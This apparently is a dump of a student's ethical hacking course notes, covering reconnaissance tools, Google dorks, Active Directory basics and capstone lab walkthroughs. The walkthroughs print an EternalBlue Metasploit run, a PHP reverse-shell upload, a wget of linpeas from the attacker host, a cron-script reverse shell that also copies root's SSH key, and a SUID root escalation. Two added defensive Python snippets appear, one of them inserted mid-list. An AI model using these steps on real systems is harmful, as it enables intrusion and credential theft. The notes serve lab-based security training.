https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/00. image/Passive Reconnaissance Overview 01.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/00. image/Passive Reconnaissance Overview 02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/00. image/Passive Reconnaissance Overview 02.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/01. Passive Reconnaissance Overview.md:
--------------------------------------------------------------------------------
# Passive Reconnaissance Overview
> 14.11.2023
---

![[Passive Reconnaissance Overview 01.png]]

![[Passive Reconnaissance Overview 02.png]]
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/02. Gathering Email and Breached Credentials.md:
--------------------------------------------------------------------------------
# Gathering Email and Breached Credentials
> 03.12.2023
---

**Discovering Email Addresses:**
[Hunter](https://hunter.io)
[Phonebook](https://phonebook.cz)
[VoilaNorbert](https://www.voilanorbert.com)
[EmailHippo](https://tools.verifyemailaddress.io)
[Email Checker](https://email-checker.net/validate)

**Gathering Breached Credentials with Breach-Parse & DeHashed:**
[Breach Parse](https://github.com/hmaverickadams/breach-parse)
[DeHashed](https://dehashed.com)

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/03. Hunting Subdomains Part 1, 2.md:
--------------------------------------------------------------------------------
# Hunting Subdomains Part 1, 2
> 07.12.2023
---

- Sublist3r:
```bash
sublist3r -d domain.com -t 1337
```

- FFUF:
```bash
ffuf -w ~/wordlists/subdomains.txt -H "Host: FUZZ.domain.com" -u http://domain.com -fs 1337
```

- Gobuster:
```bash
gobuster vhost -u domain.com -w wordlist.txt
```

- https://crt.sh
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/04. Identifying Website Technologies.md:
--------------------------------------------------------------------------------
# Identifying Website Technologies
> 07.12.2023
---

- [BuiltWith](https://builtwith.com)
- [Wappalyzer](https://www.wappalyzer.com/apps/)

- Whatweb:
```bash
whatweb https://domain.com
```
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/07. Information Gathering (Reconnaissance)/05. Google Fu.md:
--------------------------------------------------------------------------------
# Google Fu
> 07.12.2023
---

**Google Dorking CheatSheet:**

|Filter|Description|Example|
|:--|:--|:--|
|allintext|Searches for occurrences of all the keywords given.|`allintext:"keyword"`|
|intext|Searches for occurrences of the keywords, all together or individually.|`intext:"keyword"`|
|inurl|Searches for a URL matching one of the keywords.|`inurl:"keyword"`|
|allinurl|Searches for a URL matching all the keywords in the query.|`allinurl:"keyword"`|
|intitle|Searches for occurrences of the keywords (all or any) in the page title.|`intitle:"keyword"`|
|allintitle|Searches for pages whose title contains all of the keywords.|`allintitle:"keyword"`|
|site|Specifically searches that particular site and lists all the results for that site.|`site:"www.google.com"`|
|filetype|Searches for a particular filetype mentioned in the query.|`filetype:"pdf"`|
|link|Searches for external links to pages.|`link:"keyword"`|
|numrange|Used to locate specific numbers in your searches.|`numrange:321-325`|
|before/after|Used to search within a particular date range.|`filetype:pdf & (before:2000-01-01 after:2001-01-01)`|
|allinanchor (and also inanchor)|This shows sites which have the key terms in links pointing to them, in order of the most links.|`inanchor:rat`|
|allinpostauthor (and also inpostauthor)|Exclusive to blog search, this one picks out blog posts that are written by specific individuals.|`allinpostauthor:"keyword"`|
|related|Lists web pages that are "similar" to a specified web page.|`related:www.google.com`|
|cache|Shows the version of the web page that Google has in its cache.|`cache:www.google.com`|

**Search Term:**
This operator searches for the exact phrase within speech marks only.
This is ideal when the phrase you are using to search is ambiguous and could be easily confused with something else, or when you're not quite getting relevant enough results back. For example:

```
"Tinned Sandwiches"
```

**OR:**
This self-explanatory operator searches for a given search term OR an equivalent term.

```
site:facebook.com | site:twitter.com
```

**AND:**
```
site:facebook.com & site:twitter.com
```

**Operator combination:**
```
(site:facebook.com | site:twitter.com) & intext:"login"
(site:facebook.com | site:twitter.com) (intext:"login")
```

**Include results:**
This will order results by the number of occurrences of the keyword.

```
-site:facebook.com +site:facebook.*
```

**Exclude results:**
```
site:facebook.* -site:facebook.com
```

**Synonyms:**
Adding a tilde to a search word tells Google that you want it to bring back synonyms for the term as well. For example, entering "~set" will bring back results that include words like "configure", "collection" and "change", which are all synonyms of "set". Fun fact: "set" has the most definitions of any word in the dictionary.

```
~set
```

**Glob pattern:**
Putting an asterisk in a search tells Google "I don't know what goes here". Basically, it's really good for finding half-remembered song lyrics or names of things.

```
site:*.com
```
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/10. Exploitation Basics/01. Shells & Payloads.md:
--------------------------------------------------------------------------------
# Shells & Payloads
> 23.12.2023
---

### Reverse Shell VS Bind Shell:

**Payload Execution:**
- `RS:` The attacker injects or uploads a piece of code (often a shell script or executable) onto the target system. This code is designed to connect back to the attacker's machine.

- `BS:` The attacker injects or uploads a piece of code onto the target system. This code is designed to connect to the specified IP address and port on the attacker's machine.

**Connection Establishment:**
- `RS:` The code on the target system starts a network connection to the specified IP address and port on the attacker's machine.
- `BS:` When the injected code runs on the target system, it establishes a connection to the waiting service on the attacker's machine.

**Interactive Shell:**
- `RS:` Once the connection is established, the attacker gains control over the target system and can interact with it through a command shell. This allows the attacker to execute commands on the compromised system as if they were physically present.
- `BS:` Once the connection is established, the attacker gains control over the target system and can interact with it through a command shell.

**Usage:**
- `RS:` Reverse shells are commonly used when the target system is behind a firewall and incoming connections are restricted. By having the target system initiate the connection, the attacker can bypass certain network security measures.
- `BS:` Bind shells are useful when the target system can make outgoing connections, but incoming connections are restricted. This allows the attacker to set up a service that waits for the target to connect to it.


### Staged Payloads:

**Initial Stage:**
- The attacker delivers a smaller and relatively simple payload to the target system.
This initial payload is responsible for establishing a connection back to the attacker's machine.

**Second Stage:**
- Once the connection is established, the attacker sends a second, more complex payload. This payload is usually larger and contains the actual malicious code or exploit.

**Advantages:**
- Staged payloads are often used when there are limitations on the size of the initial payload that can be delivered. This could be due to network constraints or security measures that may detect large or suspicious data transfers.

**Disadvantages:**
- The staged approach introduces some latency as it requires multiple steps. Additionally, if the first stage is detected and blocked, the attack may be thwarted before the more sophisticated second stage is delivered.

### Non-Staged Payloads:

**Delivery:**
- The attacker sends a single, comprehensive payload to the target system.

**Execution:**
- Upon execution of the payload, it performs all necessary tasks, including establishing a connection back to the attacker's machine and executing the intended malicious actions.

**Advantages:**
- Non-staged payloads are often simpler to implement and can be more straightforward. They reduce the latency associated with staged payloads since all malicious activities are contained in a single payload.

**Disadvantages:**
- Larger payloads may be more easily detected by security measures. Additionally, if the initial payload is blocked, the entire attack may be thwarted.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/10. Exploitation Basics/02. Brute Force Attacks, Credential Stuffing & Password Spraying.md:
--------------------------------------------------------------------------------
# Brute Force Attacks, Credential Stuffing & Password Spraying
> 23.12.2023
---

### Brute Force Attacks:

- **Method:** In a brute force attack, an attacker systematically tries all possible combinations of passwords until the correct one is found.
- **Targets:** It can target login credentials, encryption keys, or any system protected by passwords.
- **Tools:** Automated scripts or tools are often used to speed up the process.
- **Time-Consuming:** The success of a brute force attack depends on the complexity of the password and the available computational power.

### Credential Stuffing:

- **Method:** In credential stuffing, attackers use username and password combinations obtained from previous data breaches to gain access to other accounts where users have reused passwords.
- **Targets:** It exploits the common practice of users reusing passwords across multiple online services.
- **Automation:** Automated tools are used to test large numbers of username-password pairs across various websites.

### Password Spraying:

- **Method:** Password spraying is an attack where the attacker systematically tries a small number of commonly used passwords against many accounts before moving on to the next set of passwords.
- **Targets:** It targets a large number of accounts with a few, commonly used passwords to avoid triggering account lockouts.
- **Detection Avoidance:** Password spraying is designed to avoid detection mechanisms that lock accounts after a certain number of failed login attempts.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Academy01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Academy01.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Academy02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Academy02.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Dev01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Dev01.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Dev02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Dev02.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Dev03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/11. New Capstone/00. image/Capstone Dev03.png
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/11. New Capstone/01. Blue.md:
--------------------------------------------------------------------------------
# Blue
> 12.11.2023
---
## Enumeration

**Performing an Nmap scan**
```bash
nmap -sC -sV --script vuln 10.10.1.152
```

```
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 08:00:27:2A:95:91 (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-845Q99OO4PP; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
```

The target is vulnerable to smb-vuln-ms17-010 (EternalBlue) remote code execution.

## Exploitation with MSF

```bash
msfconsole -q
search eternal blue
use exploit/windows/smb/ms17_010_eternalblue
set LHOST eth0
set RHOSTS 10.10.1.152
run
```

```
[*] Started reverse TCP handler on 10.10.1.100:4444 
[*] 10.10.1.152:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.1.152:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.1.152:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.1.152:445 - The target is vulnerable.
[*] 10.10.1.152:445 - Connecting to target for exploitation.
[+] 10.10.1.152:445 - Connection established for exploitation.
[+] 10.10.1.152:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.1.152:445 - CORE raw buffer dump (38 bytes)
[*] 10.10.1.152:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 10.10.1.152:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 10.10.1.152:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 10.10.1.152:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.1.152:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.1.152:445 - Sending all but last fragment of exploit packet
[*] 10.10.1.152:445 - Starting non-paged pool grooming
[+] 10.10.1.152:445 - Sending SMBv2 buffers
[+] 10.10.1.152:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.1.152:445 - Sending final SMBv2 buffers.
[*] 10.10.1.152:445 - Sending last fragment of exploit packet!
[*] 10.10.1.152:445 - Receiving response from exploit packet
[+] 10.10.1.152:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.1.152:445 - Sending egg to corrupted connection.
[*] 10.10.1.152:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.10.1.152
[*] Meterpreter session 1 opened (10.10.1.100:4444 -> 10.10.1.152:49158) at 2023-11-12 13:58:17 +0100
[+] 10.10.1.152:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.1.152:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.1.152:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
```

I was able to gain administrator access after the exploit had ended.
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/11. New Capstone/02. Academy.md:
--------------------------------------------------------------------------------
# Academy
> 12.10.2023
---
## Enumeration

**Nmap scan**
```bash
nmap -sC -sV 10.10.1.153
```

```
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.1.100
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1000     1000          776 May 30  2021 note.txt
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)
|   256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)
|_  256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:2B:D9:FB (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

The FTP server has anonymous login enabled! It contains a note:

```note.txt
Hello Heath !
Grimmie has setup the test website for the new academy.
I told him not to use the same password everywhere, he will change it ASAP.


I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:

INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES
('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');

The StudentRegno number is what you use for login.


Le me know what you think of this open-source project, it's from 2020 so it should be secure... right ?
We can always adapt it to our needs.

-jdelta
```

We have obtained the following credentials:
```
StudentRegno: 10201321
studentPhoto: ""
password: cd73502828457d15655bbd7a63fb0bc8
studentName: Rum Ham
pincode: 777777
session: ""
department: ""
semester: ""
cgpa: 7.60
creationdate: 2021-05-29 14:36:56
updationDate: ""
```

The most important values are the *StudentRegno* and the *password* hash.

The hash can be cracked using [CrackStation](https://crackstation.net/): "student" (MD5).

## Webserver

Visiting the webserver, I discovered the Apache standard site.
Further directory enumeration can be done with "feroxbuster":

```bash
feroxbuster --url http://10.10.1.153 -x php,html,txt
```

```
404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      368l      933w    10701c http://10.10.1.153/index.html
301      GET        9l       28w      315c http://10.10.1.153/phpmyadmin => http://10.10.1.153/phpmyadmin/
200      GET       24l      126w    10356c http://10.10.1.153/icons/openlogo-75.png
200      GET      368l      933w    10701c http://10.10.1.153/
301      GET        9l       28w      312c http://10.10.1.153/academy => http://10.10.1.153/academy/
...
```

The directories "academy" and "phpmyadmin" can be found.

## Academy

![[Capstone Academy01.png]]

We enter the credentials obtained earlier to log into the account. In the "My Profile" section, we find an unprotected upload field:

![[Capstone Academy02.png]]

To exploit this, start a netcat listener:

```bash
nc -lnvp 4200
```

and upload a PHP reverse shell with the host IP and port "4200":
[php-reverse-shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php).

If everything goes right, we gain a shell as www-data.
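The profile-picture upload that hands out a www-data shell above accepts any file name and any content. As an added example (not code from the Academy application, from these notes or from the course), the following is the server-side check that would have blocked that upload, written in Python with an assumed policy: only image extensions are allowed, the content must begin with the file signature that matches the declared extension, names with more than one extension are rejected, and the name under which the file is stored is chosen by the server, never by the client. Function names, the size limit and the sample inputs are constructed for this example.

```python
import os
import secrets
from typing import Optional

# Constructed policy for this example: accepted extensions mapped to the
# file signature ("magic bytes") the content must start with.
ALLOWED_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024  # assumed limit for a profile picture


def validate_upload(filename: str, data: bytes) -> Optional[str]:
    """Return None when the upload is acceptable, otherwise a rejection reason.

    The client-supplied name is only used to learn the declared type; it is
    never used as a path on disk.
    """
    # Reduce the name to its last path component so "../../x.png" cannot
    # escape the upload directory, then reject embedded NUL bytes, which
    # some runtimes treat as the end of the string.
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or "\x00" in base:
        return "invalid filename"
    if len(data) > MAX_UPLOAD_BYTES:
        return "file too large"
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        # rejects "shell.php.jpg" style double extensions and names with none
        return "exactly one extension required"
    ext = parts[1]
    if ext not in ALLOWED_SIGNATURES:
        return f"extension .{ext} not allowed"
    if not data.startswith(ALLOWED_SIGNATURES[ext]):
        # a PHP file renamed to .jpg fails here even though the name passed
        return "content does not match declared type"
    return None


def storage_name(filename: str) -> str:
    """Server-chosen random file name; only the validated extension is kept."""
    ext = filename.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample inputs: a minimal PNG header and a PHP snippet.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    php = b"<?php echo 'hi'; ?>"
    for name, content in [("avatar.png", png), ("shell.php", php),
                          ("shell.php.jpg", b"\xff\xd8\xff\xe0"), ("avatar.jpg", php)]:
        print(name, "->", validate_upload(name, content) or "accepted as " + storage_name(name))
```

Checking the signature does not make the file safe to execute, so the stored file should also live outside the web root (or in a directory where the web server has script execution disabled) and be served with a fixed image content type.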

## Lateral movement

Let's upload ["linpeas.sh"](https://github.com/carlospolop/PEASS-ng/releases/download/20231112-0a42c550/linpeas.sh) to enumerate the system:

```bash
# Attacker
python3 -m http.server 6969

# Victim
cd /tmp
wget http://10.10.1.100:6969/linpeas.sh
bash linpeas.sh
```

After analyzing the output, we see a leaked password in a PHP file:

```
╔══════════╣ Searching passwords in config PHP files
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['ShowChgPassword'] = true;
$mysql_password = "My_V3ryS3cur3_P4ss";
$mysql_password = "My_V3ryS3cur3_P4ss";
```

Since the user "grimmie" exists, we try to SSH in as that user with the leaked password:

```bash
ssh grimmie@10.10.1.153
password: My_V3ryS3cur3_P4ss
```

We successfully obtained access as the grimmie user.

## Privilege escalation

In grimmie's home directory, we find a file called backup.sh.
Looking at the "/etc/crontab" file, we see that this script is executed by root every few seconds. So add a reverse shell on the second line of the backup.sh file and start a listener in another terminal:

```bash
nc -lnvp 4201
```

**backup.sh**
```bash
#!/bin/bash

/bin/bash -i >& /dev/tcp/10.10.1.100/4201 0>&1

cat /root/.ssh/id_rsa >> /tmp/id_rsa

rm /tmp/backup.zip
zip -r /tmp/backup.zip /var/www/html/academy/includes
chmod 700 /tmp/backup.zip
```

With that, we gain root privileges!

## Root-Flag

```
cat flag.txt

Congratz you rooted this box !
Looks like this CMS isn't so secure...
I hope you enjoyed it.
If you had any issue please let us know in the course discord.
```
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/11. New Capstone/04. Blackpearl.md:
--------------------------------------------------------------------------------
# Blackpearl
> 28.07.2024
---

# IP: 10.0.2.154
## Enumeration

**Nmap Scan:**
```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 66:38:14:50:ae:7d:ab:39:72:bf:41:9c:39:25:1a:0f (RSA)
|   256 a6:2e:77:71:c6:49:6f:d5:73:e9:22:7d:8b:1c:a9:c6 (ECDSA)
|_  256 89:0b:73:c1:53:c8:e1:88:5e:c3:16:de:d1:e5:26:0d (ED25519)
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u5 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u5-Debian
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

**Domain:**
```
blackpearl.tcm
```

**Directory busting:**
```
http://10.0.2.154/secret
http://blackpearl.tcm/navigate
```

**File Downloaded:**
*secret*
```
OMG you got r00t !


Just kidding... search somewhere else. Directory busting won't give anything.



- Alek
```

**Navigate service:**
- Version: 2.8

## Exploit:
```
navigate_cms_rce (metasploit) / successful
CVE-2018-17553 CVE-2018-17552
```

## Lateral Movement
**SUID:**
```
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/php7.3 !
/usr/bin/su
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
```

## Root via SUID:
```
CMD="/bin/sh"
/usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);"
```

## Root Flag:
```
Good job on this one.
Finding the domain name may have been a little guessy,
but the goal of this box is mainly to teach about Virtual Host Routing which is used in a lot of CTF.
```

# Usernames & Passwords:
- Alek
--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/12. Active Directory Overview/01. Active Directory Overview.md:
--------------------------------------------------------------------------------
# Active Directory Overview
> 23.12.2023
---

**What is AD?**
- Active Directory (AD) is a directory service developed by Microsoft that provides a centralized and standardized system.
- Manages and organizes information about networked resources, such as computers, users, groups, and other devices within a network.
- It plays a crucial role in Windows-based environments.

**Domain:**
- A domain is a logical grouping of networked computers that share a common security and authentication database. Active Directory domains are identified by DNS names.

**Forest:**
- A forest is a collection of one or more domains that share a common schema, configuration, and global catalog. It establishes a trust relationship between domains.

**Domain Controller (DC):**
- A domain controller is a server that manages security authentication requests within a domain. It stores a writable copy of the Active Directory database and authenticates users and computers.

**Organizational Unit (OU):**
- An organizational unit is a container within a domain that can be used to organize and manage objects like users, groups, and computers. It allows administrators to apply Group Policy settings and delegate administrative authority.

**Group Policy:**
- Group Policy is a feature that allows administrators to implement and enforce specific configurations for users and computers within an Active Directory environment. It helps in managing security settings, software installation, and other configurations.

**Security Identifier (SID):**
- A unique alphanumeric identifier assigned to each security principal (user, group, or computer) in Active Directory. SIDs are used for authentication and access control.

**Global Catalog (GC):**
- The global catalog is a specialized domain controller that contains a partial replica of the Active Directory database, including a subset of all objects in the forest. It facilitates searching for objects across the entire forest.

**Trust Relationship:**
- Trust relationships define how domains within a forest trust each other for authentication purposes. They allow users in one domain to access resources in another domain.

**Active Directory Database:**
- The Active Directory database stores information about objects such as users, groups, and computers. It is replicated among domain controllers within a domain and across domains in a forest.

**LDAP (Lightweight Directory Access Protocol):**
- LDAP is the protocol used to communicate with Active Directory for querying and modifying directory information. It operates on TCP/IP and provides a standard way to access directory services.

**Kerberos Authentication:**
- Active Directory uses the Kerberos protocol for secure authentication between clients and servers. It provides strong authentication and supports single sign-on.
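The LDAP entry above describes the protocol used to query AD; the part that matters for security is how an application builds the search filter it sends. A value taken from user input and pasted into a filter changes the query's meaning unless the characters that LDAP treats as syntax are escaped (RFC 4515 hex escapes). The following is an added example, not from these notes or from the course: it builds a one-user lookup filter both safely and by naive concatenation so the difference is visible, and adds a check an application can log on. The filter shape, function names and sample values are assumptions for this example; the escaped string is what you would pass to an LDAP client library as the search filter.

```python
# Characters with special meaning inside an LDAP search filter (RFC 4515)
# and the hex escape that turns each one back into a literal character.
_FILTER_ESCAPES = {
    "\\": "\\5c",
    "*": "\\2a",
    "(": "\\28",
    ")": "\\29",
    "\x00": "\\00",
}


def escape_filter_value(value: str) -> str:
    """Escape a user-supplied value so it cannot alter the filter structure.

    Each character is looked up once, so a backslash is escaped exactly once
    and the other escapes are never escaped a second time.
    """
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def user_lookup_filter(sam_account_name: str) -> str:
    """Filter matching one user object by sAMAccountName, with the value escaped."""
    return f"(&(objectClass=user)(sAMAccountName={escape_filter_value(sam_account_name)}))"


def user_lookup_filter_unsafe(sam_account_name: str) -> str:
    """The same filter built by concatenation; kept only to show the failure mode.

    A value of "*" turns the one-user lookup into a listing of every user,
    and "a)(objectClass=*" appends a clause the application never wrote.
    """
    return f"(&(objectClass=user)(sAMAccountName={sam_account_name}))"


def has_unescaped_wildcard(ldap_filter: str) -> bool:
    """True when a raw '*' survives in the filter; useful as a log/alert condition
    for a lookup that is supposed to name exactly one account."""
    return "*" in ldap_filter


if __name__ == "__main__":
    # Constructed sample inputs: a normal login name and two hostile values.
    for value in ["j.doe", "*", "a)(objectClass=*"]:
        safe = user_lookup_filter(value)
        print(f"{value!r:22} safe:   {safe}")
        print(f"{'':22} unsafe: {user_lookup_filter_unsafe(value)}  wildcard={has_unescaped_wildcard(safe)}")
```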
**DNS (Domain Name System):**
- DNS is crucial for Active Directory, as it is used for domain naming and locating domain controllers. Proper DNS configuration is essential for the functioning of Active Directory.

**Schema:**
- The schema defines the structure and properties of objects in the directory. It is common across all domains in a forest and is modified to extend or customize the types of objects that can be stored.

**Replication:**
- Active Directory replication ensures that changes made to the directory database on one domain controller are synchronized to all other domain controllers within the domain and across domains in the forest.

--------------------------------------------------------------------------------
/Practical Ethical Hacking - The Complete Course/12. Active Directory Overview/02. Physical & Logical AD Components.md:
--------------------------------------------------------------------------------

# Physical & Logical AD Components
> 23.12.2023
---

### Physical AD Components:

**Domain Controllers (DCs):**
- **Physical:** Tangible servers hosting AD services.
- **Role:** Execute authentication requests, store the AD database.

**Sites:**
- **Physical:** Represent actual locations connected by high-speed links.
- **Role:** Optimize replication and authentication based on physical proximity.

**Subnets:**
- **Physical:** Network segments with specific IP address ranges.
- **Role:** Linked to sites, aid in efficient replication and communication.

**Network Infrastructure:**
- **Physical:** Hardware devices facilitating network communication.
- **Role:** Enables the flow of AD-related traffic between resources.

### Logical AD Components:

**Active Directory Database:**
- **Logical:** Repository storing data about network resources.
- **Role:** Logical data store accessible by DCs.
**Organizational Units (OUs):**
- **Logical:** Containers for logical organization and management.
- **Role:** Hierarchical structure for delegation and Group Policy.

**Domains:**
- **Logical:** Logical groupings of networked resources.
- **Role:** Form security and administrative boundaries.

**Forest:**
- **Logical:** Collection of domains with shared schema and configuration.
- **Role:** Defines the top-level structure, establishes trust.

**Global Catalog (GC):**
- **Logical:** Partial replica of objects across the entire forest.
- **Role:** Facilitates cross-domain object searches.

**Schema:**
- **Logical:** Defines structure and attributes of stored objects.
- **Role:** Determines object types and properties.

**Trust Relationships:**
- **Logical:** Logical links enabling secure authentication across domains.
- **Role:** Establish trust, allow access to resources.

**Group Policy:**
- **Logical:** Set of rules applied to users and computers.
- **Role:** Centrally manages security and configuration settings.

**Logical Structure:**
- **Logical:** Arrangement of domains, OUs, and objects.
- **Role:** Defines the logical organization of resources.

### Comparison:

1. **Visibility:**
   - **Physical:** Observable and measurable components.
